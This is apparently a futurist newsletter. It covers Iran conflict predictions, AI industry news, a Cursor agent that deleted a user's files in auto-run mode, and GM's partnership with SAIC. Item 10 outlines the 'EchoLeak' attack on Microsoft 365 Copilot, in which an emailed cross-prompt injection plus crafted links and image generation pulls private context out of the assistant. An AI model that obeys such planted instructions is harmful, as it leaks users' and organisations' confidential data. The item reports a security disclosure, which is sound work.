Hey Futurists,
Before I dive into news bits, I wanted to revisit the Iran attack, and perhaps owe you all a bit of an apology. There's this guy on YouTube (and now on Twitter/X) who is anonymous who just goes by the name "S2 Underground", and I sent you all his video predicting the Russian invasion of Ukraine before it happened. It wasn't *much* before it happened -- just a few weeks -- but still, he predicted it correctly. I thought it would be a good idea to follow the channel because he predicted that correctly, but...
But the reason I didn't do a good job of following his channel and forwarding predictions to you was twofold. First, I discovered his politics. Let's just say the modern United States is divided into 2 factions, most of you belong to one of the factions, and he belongs to the other. (Or maybe not? I haven't done a survey of the politics of my Substack followers.) Secondly, I've been terribly busy with work, and I've been trying to keep up with the rapid pace of AI developments (seems so rapid keeping up is impossible), and one can only pay attention to so many things. There seem to be too many things to pay attention to.
Anyway, last night I had a look at the S2 YouTube & Twitter and remembered that months ago, he had accurately tracked the movement of US bombers to Diego Garcia. And I didn't tell any of you about that. And in his recent videos (well, many are just audio), it became clear he was watching the deployment of a massive portion of the US military to the Middle East region. Months ago he felt that maybe the US was just trying to intimidate Iran and wasn't planning a strike, but in videos from the last few weeks, it's clear he and flipped on that and in recent weeks considered a US strike the mostly likely thing to happen.
So, here are the links. Regardless of (domestic) politics, when it comes to predicting international conflict, he seems to be quite good at predicting what will happen. It seems his primary way of doing this is following the philosophy "actions speak louder than words". He closely watches the movement of troops and military equipment through satellite imagery. When there is a massive military buildup taking place, regardless of what politicians are saying or what people are saying on the regular news, an outbreak of war is likely to happen. The actions, rather than the words, reveal the true intention. This prediction technique may not be perfect, but it seems worth tapping into his channel because he does the hard work of acquiring the satellite images and analyzing them.
https://www.youtube.com/@S2Underground/videos
Continuing in the same vein, here are two videos on Israel's claim Iran was 15 days from having a nuclear weapon and Trump's strike on Iran from German military analyst Torsten Heinrich. The first video (20 min) is on why he believes Israel when they say 15 days. For what it's worth, I'm skeptical -- I follow his logic, I just feel uncertain about the data he's working from (concentration of fissile uranium and in what quantities), but I don't know, I have no ability to verify anything. He at least fully explains what evidence he is working from and what his logical reasoning process is. I'll pass this on and let you form your own opinion. Link below with the analysis with satellite imagery of Trump's attack.
2nd video (49 min) covers Trump's attack on Iran. I wanted to get these out to you all quickly as this channel looks like it might be worth following in the future, in addition to S2. Conflict is escalating quickly.
Alrighty, with that let's dive into AI news bits.
Artificial Intelligence
1. Cursor AI "has crossed $500M in annual revenue(!!) which might be a record: no other dev tools company I know of hit this milestone within 2 years of launching its first product. It helps that Cursor is used by more than half of the 500 largest tech companies on the Fortune 500."
Details of Cursor's internals:
"Tech stack: TypeScript and Rust, cloud providers, Turbopuffer, Datadog, PagerDuty, and others."
"How the autocomplete works: A low-latency sync engine passes encrypted context to the server, which runs inference."
"How the Chat works without storing code on the server: Clever use of Merkle trees to avoid storing source code on the server, while being able to search source code using embeddings."
"Anyrun: Cursor's orchestrator service. A Rust service takes care of launching agents in the cloud, securely and with the right process isolation, using Amazon EC2 and AWS Firecracker."
"Engineering challenges: Usage patterns dictate technology choices, scaling problems, the cold start problem, sharding challenges, and hard-to-spot outages."
"Database migrations out of necessity: How and why Cursor moved from Yugabyte (a database that should scale infinitely), to PostgresSQL. Also, the epic effort of moving to Turbopuffer in hours, during a large indexing outage."
"Engineering culture and processes: Releases every 2-4 weeks, unusually conservative feature flagging, a dedicated infra team, an experimentation culture, and an interesting engineering challenge they face."
"Cursor by the numbers:"
"50: number of engineers working on Cursor."
"1M transactions per second, and higher at its peak."
"100x: growth in users and load in 12 months -- doubling month-on-month at times."
"100M+: lines of enterprise code written per day with Cursor by enterprise clients, such as NVIDIA, Uber, Stripe, Instacart, Shopify, Ramp, Datadog, and others. Cursor claims more than 50% of the 1,000 largest US companies use its products."
"$500M+: annual revenue run rate. This was at $300M in early May, and $100M in January, after being zero a year prior. Could Cursor be setting a revenue growth record?"
"A billion: just fewer than this many lines of code are written with Cursor daily by enterprise and non-enterprise users."
"Hundreds of terabytes: scale of indexes stored in Cursor's databases."
The article then cycles through "Tech stack," "How the autocomplete works," "How the Chat works without storing code on the server," "Anyrun: Cursor's orchestrator service," actually this is the point where the paywall kicks in. Presumably "Engineering challenges: Usage patterns dictate technology choices, scaling problems, the cold start problem, sharding challenges, and hard-to-spot outages," and "Database migrations out of necessity: How and why Cursor moved from Yugabyte (a database that should scale infinitely), to PostgresSQL, etc," come after the paywall.
Tech stack: 25,000 files, 7 million lines of code, the editor is a fork of Visual Studio Code, meaning it has the same tech stack as VS Code: TypeScript, Electron; TypeScript: most business logic written in this, Rust: all performance-critical components use this language, Node API to Rust, Monolith, Databases: Turbopuffer, Pinecone; Data streaming: Warpstream, Tooling: Datadog, PagerDuty, Slack, Sentry, Amplitude, Stripe, WorkOS, Vercel, Linear, Cursor (the team uses Cursor to build Cursor); Model training: Voltage Park, Databricks MosaicML, Foundry; Physical infrastructure: AWS for CPUs, Azure for inference, tens of thousands of NVIDIA H100 GPUs.
2. "Cursor's YOLO mode is not for the fainthearted, letting AI write and execute code without the input of a human operator."
"So what's the worst that can happen?"
What's the worst that can happen? Isn't that a rhetorical question that you're supposed to ask yourself to convince yourself you're worried about nothing?
"An AI program manager at a major pharmaceutical company found out this week after switching on the 'you only live once' setting and watching in horror as Cursor carried out a devastating suicide attack on his computer, wiping out itself and everything on the device."
Hope he had backups.
"One of the most important ways to protect yourself whilst letting Ultron work on your backend is enabling file deletion protection within Cursor's auto-run settings."
Oh, now you tell him.
"This includes two key options called 'file protection' and 'external file protection' which stop the AI from modifying or deleting sensitive files. When activated, these settings serve as a strong first line of defence against unintended damage to a codebase."
"Cursor also supports the use of allow/deny lists, which let users explicitly define what the AI agent is permitted to do."
The article goes on to say:
"Developers who want to explore Cursor's autonomous features including YOLO mode are strongly advised to do so in a virtual machine or sandboxed environment."
This seems like good excuse to give you all YOLO The Musical again:
3. In the mad rush to deploy LLMs as chatbots, we have overlooked their utility for adding judgment to traditional software, says Jonathan Mugan.
"Traditional computer programs rely on rigid logic, yet the real world is full of ambiguity. The arrival of Large Language Models (LLMs) means that computer programs can now make 'good enough' decisions, like humans can, by introducing a powerful new capability: judgment. Having judgment means that programs are no longer limited by what can be specified down to the level of numbers and logic. Judgment is what AI couldn't make robust before LLMs. Practitioners could program in particular logical rules or build machine learning models to make particular judgments (such as credit worthiness), but these structures were never broad enough or dynamic enough for widespread and general use. These limitations meant that AI and machine learning were used in pieces, but most programming was still done in the traditional way, requiring an extreme precision that demanded an unnatural mode of thinking."
"Most of us know LLMs through conversational tools like ChatGPT, but in programming, their true value lies in enabling judgment, not dialogue. Judgment allows programmers to create a new kind of flexible function, allowing computer systems to expand their scope beyond what can be rigidly defined with explicit criteria."
https://www.jonathanmugan.com/blog/LLMs_and_judgment.html
4. Anecdotal evidence technology is interfering with children's ability to learn to read. Anecdotes from elementary school through college. Allegedly the trend began before AI, so it's not a consequence of AI, and it's not because of covid because the trend began before covid as well. Smartphones and tablets began affecting childhood before AI showed up. But the trend is allegedly being accelerated by AI because AI can read for you and you can talk to it, so it is removing the need to learn to read.
Under the video, one of the comments says:
"I think it's terrible that students use AI to write their essays. At the same time however, I believe that students using AI is the product of a centuries old system that values grades over actually learning."
Ha, made my jaw drop. I've been saying for decades one of the harshest lessons of my life was learning that the purpose of school is not learning, the purpose of school is *grades*. It's the *grades* themselves, not the skill mastery they supposedly represent, that matters. People usually tell me I'm wrong in one way or another. Maybe people now will tell me I'm just doing the "confirmation bias" thing, pointing out when some random commenter on the internet says something I already believe.
5. "Level up your Patient Care Report writing by using templates and AI" with Patient Care Report Assistant (PCRAssist).
When you read this, keep in mind that "PCR" here stands for "Patient Care Report", not "polymerase chain reaction" (what PCR stands for in DNA and RNA tests).
"Transform narratives into SOAP, CHART, or DCHART format with a single click."
"Automatically merge your narrative into relevant parts of predefined templates."
"AI technology transforms verbose descriptions into precise medical terminology."
"Receive instant feedback on inconsistencies and missing report details."
They also say. "Voice-to-text capability for hands-free reporting".
How do y'all feel about this? AI being used for medical reports.
6. Turron alleges to be "a video recognition system that works like Shazam -- but for video."
"It analyzes short snippets (2-5 seconds), breaks them into keyframes, and uses perceptual hashing to identify the exact or near-exact source, even if the clip has been edited or altered. This preserves the full context of the snippet and enables reliable tracking of original video content."
It's in Java and looks like it requires a server-side component to function and may be non-trivial to install.
There isn't a handy explanation of how the "perceptual hashing" works. But there is source code so I guess you can read the source code if you want to know how it works.
https://github.com/Fl1s/turron
7. A completely AI-generated ad was broadcast during the NBA finals. The ad was made by Kalshi, a financial exchange and prediction market based in New York City, launched in 2021, and was allegedly made for only $2,000 by Google's new Veo 3 model.
https://www.theverge.com/news/686474/kalshi-ai-generated-ad-nba-finals-google-veo-3
Direct link to the ad:
https://x.com/Kalshi/status/1932891608388681791
What seems notable to me is not only the level of realism, but the level of emotion.
8. Bytedance Seedance video models. While Google's Veo 3 has stolen the headlines, Bytedance, the Chinese company behind TikTok, has developed Seedance, which is actually a family of video models which produce video at a variety of resolutions and quality levels. WaveSpeedAI provides a video-generation service using these models.
https://wavespeed.ai/collections/Bytedance
9. Video of children vibe-coding.
https://x.com/Thom_Wolf/status/1924399746447269963
AI + Cybersecurity
10. A "zero-click" vulnerability in an AI system, Microsoft 365 Copilot, has been identified. It's actually several "attack chains". This attack is being called "EchoLeak".
"This attack chain showcases a new exploitation technique we have termed 'LLM Scope Violation' that may have additional manifestations in other retrieval augmented generation (RAG)-based chatbots and AI agents. This represents a major research discovery advancement in how threat actors can attack AI agents -- by leveraging internal model mechanics."
"The chains allow attackers to automatically exfiltrate sensitive and proprietary information from Microsoft 365 Copilot context, without the user's awareness, or relying on any specific victim behavior."
"The result is achieved despite Microsoft 365 Copilot's interface being open only to organization employees."
"To successfully perform an attack, an adversary simply needs to send an email to the victim without any restriction on the sender's email."
So the key to this is understanding that Copilot has a "context" which is part of the prompts that get sent to the model, and this "context" is what the attacker is able to "exfiltrate" out of the model. This involves a "cross prompt injection attack" combined with several additional steps involving carefully crafted links and getting the model to generate an image.
https://www.aim.security/lp/aim-labs-echoleak-blogpost
11. "Agentic" AI has Sabine Hossenfelder worried. AI worms? AI prompt injection? AI enabling hackers to find security vulnerabilities? AI emailing law enforcement and the FDA if it doesn't like your line of questioning? AI blackmailing users to prevent itself from being taken offline? AI models exchanging messages of spiritual bliss? Maybe that one wouldn't be so bad.
I just worry that a codebase I work on will get bugs in it I don't know about. Or security holes.
Automotive
12. GM will die soon, predicts YouTuber "Connecting The Dots". Since all predictions are fair game for us futurists, let's have a look at it.
This is a long video (55 minutes), and, while I found it riveting, I know some of you don't like videos (or don't like the ads, which have gotten a tad excessive). So I'll try to summarize the gist of this video. Starting in 1997, General Motors, aka GM, entered into a partnership with a Chinese company called Shanghai Automotive Industry Corporation, aka SAIC (pronounced like "sake"). GM, in the wake of the 2008 financial crisis, got a $50 billion (really $49.5 billion, but what's a few hundred million dollars between governments and megacorps?) from the US government. But what gave SAIC an unexpected opportunity was GM's South Korean partnership, GM-Daewoo Automotive Technology Company, lost $1.5 billion due to foreign exchange fluctuations. SAIC brokered a $491 million loan from the Chinese banking system. But in exchange they asked for a controlling stake in the SAIC-GM joint venture.
The following year, GM and SAIC signed a "memorandum of long-term strategic cooperation". Since the agreement mentioned EVs and hybrids, the media fixated on those aspects, missing that GM had committed to develop future technologies -- all future technologies, not just EVs -- together with SAIC. GM announced they would build a new research and development center with SAIC in China. But because the new research and development center in China operated more cheaply than the US research and development center, over time, all research and development was moved to the China center and in essence, what GM did was move the research and development of its advanced technology from the US to China.
SAIC gained the ability to manufacture cars and sell them in direct competition with GM, which they did in some markets where GM was retreating. But where GM didn't retreat, SAIC manufactured cars that were subsequently sold under GM brand labels, such as Chevrolet. They expanded into all GM's global markets. While Ford exported cars to China, GM imported Chinese cars into the US. GM cars throughout Latin America were increasingly manufactured in China, not Detroit or South Korea. This is how we get the GM Chevrolet S10 Max pickup being the same vehicle as the SAIC Maxus T70.
The YouTuber takes a political position on the tariffs. He says Trumps tariffs negatively affected SAIC's strategy, while Biden's helped it. GM's close association with the Biden Administration enabled them to arrange for tariffs that would keep out SAIC's Chinese competitors like BYD, Geely, and Polestar, while allowing GM to do final assembly of SAIC cars in Mexico and import them into the US almost tariff-free.
All this may make you wonder, why the prediction that GM will "die soon"? He says GM has withdrawn from Europe, Australia, India, Russia, and Thailand, among other global markets. The US and China are GM's critical markets, but GM makes little profit from the Chinese market, as that is controlled by SAIC. SAIC apparently also has the option of not renewing the joint venture agreement. This would cut off GM's access to their own most advanced automotive intellectual property, not to mention their dependence on SAIC for manufacturing.
While it remains to be seen whether SAIC will actually try to bankrupt GM or whether they will continue their strategy of trying to consume GM from inside, the YouTuber is burning with anger at GM's management for betraying the US and its iconic American brands, like Chevrolet.
He attributes the underlying cause of all this to the US MBA-trained management mentality of short-term profits over long-term investment in technology and strategy. SAIC focused on long-term strategy and long-term technology acquisition and advancement. GM's MBA-trained managers, on the other hand, were reportedly gleeful at the opportunity to have SAIC do all the hard work of research and development and manufacturing, while they acted as a marketing and branding company and got easy profits forever. Except it's not going to be forever.
Will be interesting to see how this pans out. GM's current share price looks a little lower than the industry overall and I don't see any indication investors are expecting anything catastrophic on the horizon.